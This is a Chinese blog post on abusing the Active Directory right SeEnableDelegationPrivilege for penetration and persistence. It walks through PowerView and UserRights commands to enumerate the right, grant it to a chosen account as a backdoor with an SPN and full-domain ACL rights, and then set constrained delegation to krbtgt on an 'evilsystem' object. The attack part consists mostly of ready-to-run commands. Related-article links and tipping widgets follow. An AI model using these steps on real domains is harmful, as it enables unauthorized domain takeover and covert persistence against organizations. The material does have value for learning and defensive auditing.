SeEnableDelegationPrivilege权限的利用

最新推荐文章于 2022-12-04 20:06:45 发布
最新推荐文章于 2022-12-04 20:06:45 发布
阅读量4.7w 收藏 3
点赞数 3
分类专栏: 内网渗透 权限维持 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41874930/article/details/111560977
版权

文章目录

1. 前言

SeEnableDelegationPrivilege权限的作用是配置约束性委派。拥有SeEnableDelegationPrivilege权限的人可以配置任意一台主机的约束性委派,但这个权限一般情况下只有域控才有,如果在渗透过程中控制一个拥有SeEnableDelegationPrivilege权限的账户,那基本约等于控制了整个域。

2. SeEnableDelegationPrivilege权限的拥有者是谁?

1. 通过powerview

以下命令需要导入powerview:

Set-ExecutionPolicy Bypass -Scope Process
. ./powerview.ps1
Get-DomainPolicy -Source DC
#看privilegerights的最后一项确定sid为S-1-5-32-544
"S-1-5-32-544"|Convert-SidToName

在这里插入图片描述
在这里插入图片描述

2. 通过GPO

Get-DomainPolicy -Source DC
type "\\test.com\sysvol\test.com\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
"S-1-5-32-544"|Convert-SidToName

第一条命令得到path的值,用第二条命令读path所指定的文件,看最后一行,确定sid后跟第一步使用"S-1-5-32-544"|Convert-SidToName来获取sid对应的用户:
在这里插入图片描述在这里插入图片描述

3.通过UserRights(只在域控上执行有效)

下载地址:https://github.com/shanfenglan/test

Set-ExecutionPolicy Bypass -Scope Process
Import-Module .\UserRights.psm1
Get-AccountsWithUserRight -right SeEnableDelegationPrivilege

在这里插入图片描述

3. 如何给其他用户配置SeEnableDelegationPrivilege权限

需要导入userrights

Grant-UserRight -Account zhangsan -Right SeEnableDelegationPrivilege
Get-AccountsWithUserRight -Right SeEnableDelegationPrivilege

在这里插入图片描述
给zhangsan账号添加一个任意的spn:

setspn -s test/zhangsan zhangsan

在这里插入图片描述
设置zhangsan账号对整个域的完全控制权限:

Add-DomainObjectAcl -TargetIdentity zhangsan -PrincipalIdentity zhangsan -Rights All

验证:

Get-DomainObjectAcl | ?{$_.SecurityIdentifier -match "S-1-5-21-3763276348-88739081-2848684050-1110"} | select objectdn,ActiveDirectoryRights

在这里插入图片描述
更新组策略:gpupdate /force

以上四步缺一不可

setspn -U zhangsan #查询zhangsan的spn
在这里插入图片描述

4.如何利用拥有SeEnableDelegationPrivilege权限的普通用户

先导入powerview跟userrights

1.查询已有的配置了约束性委派的机器
发现没有配置。

Get-DomainComputer -TrustedToAuth -Domain test.com -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto

在这里插入图片描述

2.确定当前用户具有SeEnableDelegationPrivilege权限

whoami /all
Get-DomainPolicy -Source DC
type "\\test.com\sysvol\test.com\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"

在这里插入图片描述
对比后发现当前用户的sid在SeEnableDelegationPrivilege的值中。

3.利用当前用户的权限配置主机的约束性委派

Set-ExecutionPolicy Bypass -Scope Process
. ./powerview.ps1
Get-ADObject -Identity "evilsystem" | Set-ADObject -Set @{ "msDS-AllowedToDelegateTo"=("krbtgt/test.com")}

参考文章

域渗透——SeEnableDelegationPrivilege的利用
那些从未听过的高危用户权限
Windows内网协议学习LDAP篇之域权限下
一种深度隐秘的域后门方式

Shanfenglan7
关注
专栏目录
【域权限维持】-SeEnableDelegationPrivilege
qq_41617902的博客
01-20 239
拥有SeEnableDelegationPrivilege权限的账户,可以配置任意一台主机的约束性委派
Kerberos 委派攻击原理之 S4U2 利用详解
HBohan的博客
07-20 1344
Kerberos 委派攻击原理之 S4U2 利用详解 为了更好地防止约束委派的滥用,请查看"从 Kekeo 到 Rubeus"文章中的"s4u"部分。 几周前,我和同事李 · 克里斯滕森(在他的帮助下我完成了这篇文章和相关材料)花了一些时间深入研究了活动目录的 S4U2Self 和 S4U2Proxy 协议扩展。 就在最近,本杰明 · 德尔皮 和 Ben Campbell在推特上就同一话题进行了一次有趣的公开对话。 对话的结果是本杰明发布了一个修改过的 Kekeo,使得滥用 S4U 错误配置更为容易。 在我
域渗透基础知识(五)之OU组织单位、ACL、SeEnableDelegationPrivilege特权
最新发布
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-04 2297
OU,即组织单位(Organization Unit),是一个容器对象,将域中的对象组织成逻辑组,帮助网络管理员简化管理组。组织单位包含下列类型的对象:用户,计算机,工作组,打印机,安全策略以及其他组织单位等。可以在组织单位基础上部署组策略,统一管理组织单位中的域对象。 在企业域环境里面,我们经常可以看到按照部门划分的一个个 OU,如下图所示:组织单位(OU)是专用容器,与常规容器的区别在于管理员可以将组策略应用于 OU,然后系统将其下推到 OU 中的所有计算机,但是你不能将组策略应用于容器。
程序的权限
weixin_34199405的博客
07-07 154
最近的蒸笼天+考试月能把人给折磨坏了,今天考完了比较恶心的一科后,逛了逛如鹏网(好久没上了),看到了有人写了个定时关机的小程序,我只看了标题,然 后就想自己写写试试。于是就开始查相关的api函数,很简单的一个函数调用就可以实现:ExitWindowsEx();可是烦人的来了,编译成功,执行 成功,然后系统就没反应了。。。==!最终:权限问题!!!!!!!!!!!于是找了篇...
【总结】用户权限设置和进程权限提升
华秋实的专栏
11-29 3万+
使用某些Windows API的时候需要提升进程的默认权限,例如RegRestoreKey需要SE_RESTORE_NAME 和SE_BACKUP_NAME 权限。在这种情况下,我们需要使用到一组Windows API提升进程权限。需要的函数有: 1.OpenProcessToken 2.LookupPrivilegeValue 3.AdjustTokenPrivileges 使用
如何代码设置以管理员身份启动程序
gjtboa的专栏
01-07 1795
将UAC级别设置为图中所示就可在工程生成的程序启动时自动请求获得管理员权限 -------------------------------------------------------------------------------------------------------------------------------------------------------------
『AD域攻防实践』第二期学习笔记
ZAWX_NETSTARSEC的博客
09-13 675
上一周的直播课中,小伙伴们跟随御守实验室的师傅一起了解了“AD域在攻防对抗场景下的安全现状”,课程结束后,我们为大家整理了学习笔记,也将录屏和PPT公布在了公众号和微信群,帮助大家查漏补缺。 在小伙伴们的热情支持下,『AD域攻防实践』系列第二期也成功于9月6号晚20:00在bilibili圆满结束。 本期主要内容为“AD域安全风险“,由GPP老师讲解,为了方便大家对域内风险有更全面深入的理解,GPP老师按照攻击阶段,将域内风险分为信息收集、横向移动、权限提升和权限维持四个部分,深入浅出地为我们讲
此计算机必须为委派而被信任_信任计算机和用户帐户用于委派(Windows 10) - Windows security | Microsoft Docs...
weixin_39723920的博客
12-24 1567
信任计算机和用户帐户可以执行委派Enable computer and user accounts to be trusted for delegation04/19/2017本文内容适用范围Applies toWindows 10Windows10介绍 "允许计算机和用户帐户受信任以供委派安全策略" 策略设置的最佳做法、位置、值、策略管理和安全注意事项。Describes the best pr...
以System帐户身份运行应用程序的三种办法
王天(C/C++)
10-15 3825
很多时候我们需要提高本进程的权限,比如要把DLL注入类似Winlogo、csrss系统进程。如果使用默认的权限肯定是做不到的。BOOL EnablePrivilege(LPCTSTR lpszPrivilegeName,BOOL bEnable){    HANDLE hToken;    TOKEN_PRIVILEGES tp;    LUID luid;   
三个给进程提权的方法 (c/cpp)
weixin_30316097的博客
01-13 665
三个给进程提权的方法 方法一: C/C++ code bool EnableDebugPrivilege() { HANDLE hToken; LUID sedebugnameValue; TOKEN_PRIVILEGES tkp; if (!OpenProcessToken(GetCurrentProc...
PSPrivilege:在PowerShell中管理进程特权并调整Windows权限特权
04-27
PS特权 PowerShell模块,允许您在当前进程上启用/禁用/删除特权,以及修改Windows主机的权利和特权的成员资格。 信息 此PowerShell模块包含8个PowerShell cmdlet,这些cmdlet用于调整Windows主机上的特权和权限。 有4个cmdlet可用于在localhost或远程主机上管理系统范围的特权。 这些cmdlet是; Add-WindowsRight :将安全主体添加到特权/权限。 Clear-WindowsRight :删除安全主体的所有特权/权限或特权/权限的所有主体。 Get-WindowsRight :获取有关特权/权利的信息。 Remove-WindowsRight :从特权/权限中删除安全主体。 还有另外4个cmdlet可用于管理当前进程的特权。 这些cmdlet是; Disable-ProcessPrivilege
VC提权代码
weixin_30587025的博客
04-14 125
//方法一: bool EnableDebugPrivilege() { HANDLE hToken; LUID sedebugnameValue; TOKEN_PRIVILEGES tkp; if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_...
Windows环境下提升进程的权限
热门推荐
while(1) { smile(); }
01-26 11万+
有时候我们需要对进程的权限进行提升,从而使进程能进行某种操作,如打开系统进程等等。 在Windows环境下,进程权限的种类定义如下(定义在winnt.h): #define SE_CREATE_TOKEN_NAME TEXT("SeCreateTokenPrivilege") #define SE_ASSIGNPRIMARYTOKEN_NAM
windows之 访问控制模型
点点灵犀
06-10 2249
当一个线程使用Open*打开一个内核对象时,会发生什么? 有两种可能: 1. 打开成功,拿到句柄 2. 打开失败 这不是废话么?!为啥打开失败呢?有两种可能: 1. 当前线程不具有指定的特权 2.  权限不足(由dwDesiredAccess参数指定权限) 这个时候就引入了今天的主题:令牌(包含特权列表)和安全描述符(描述用户权限)。 Token token是什么?对
如何提升程序权限
HelloKandy's Blog
01-29 988
如何自己给程序提升权限: BOOL EnablePrivilege(LPCSTR lpName, BOOL fEnable) { HANDLE hObject; LUID Luid; TOKEN_PRIVILEGES NewStatus; if (!OpenProcessToken(GetCurrentProcess(), TOK
grant User 使用
天下无双
01-13 2096
创建一个新的用户 并授予权限: 该用户可以访问test数据库的所有表。但是只能从指定ip(主机)访问mysql> grant all on test.* to admin@172.72.101.42  identified by 123;Query OK, 0 rows affected (0.00 sec)查看指定用户的权限 show grantsmysql> s
【转+修改】Secedit:命令行下操作组策略
Mr. Cypress 柏树 先生
06-06 2万+
组策略是建立Windows安全环境的重要手段,尤其是在Windows域环境下。一个出色的系统管理员,应该能熟练地掌握并应用组策略。在窗口界面下访问组策略用gpedit.msc,命令行下用secedit.exe。 先看secedit命令语法: secedit /analyze secedit /configure secedit /export  secedit /validate 。。
SeDebugPrivilege
积累点滴,保持自我
04-10 6424
要对一个任意进程(包括系统安全进程和服务进程)进行指定了写相关的访问权的OpenProcess操作, 只要当前进程具有SeDeDebug权限就可以了。 要是一个用户是Administrator或是被给予了相应的权限, 就可以具有该权限。 可是,就算我们用Administrator帐号对一个系统安全进程执行OpenProcess(PROCESS_ALL_ACCESS,FALSE,     d
20210515web渗透学习之域渗透简单实操
qq_45290991的博客
05-17 622
这是总结前面几种域渗透的综合文章。工欲善其事必先利其器,今晚我的憨逼班长又帮我报错了加班地点,我一直是一个人在最远的加班室加班的,因为比较享受那种一个人学习的感觉吧。。今夜的郑州下着淅淅沥沥的雨,清凉的风带着雨水的气息从窗台吹进加班的书桌,一个人静静地喝着饮料听着歌前几年的神曲《爱河》,还有自己喜欢听的老版三国的主题曲《历史的天空》,一边学习web渗透,累了做做眼保健操看看《资治通鉴》。我觉得这样的人生真的很好很完美了。我喜欢一个人独处的时光,慢到能够专注做一件事,慢到仿佛能够听到时间河流流动的声息。我又回
bat批处理如何删除本地策略里的用户权限分配中的拒绝从网络访问本机项的guest用户?...
06-05 980
echo [Version]>mm.inf echo signature="$CHICAGO$">>mm.inf echo Revision=1>>mm.inf echo [Privilege Rights]>>mm.inf echo SeDenyNetworkLogonRight =>>mm.inf secedit...
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shanfenglan7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值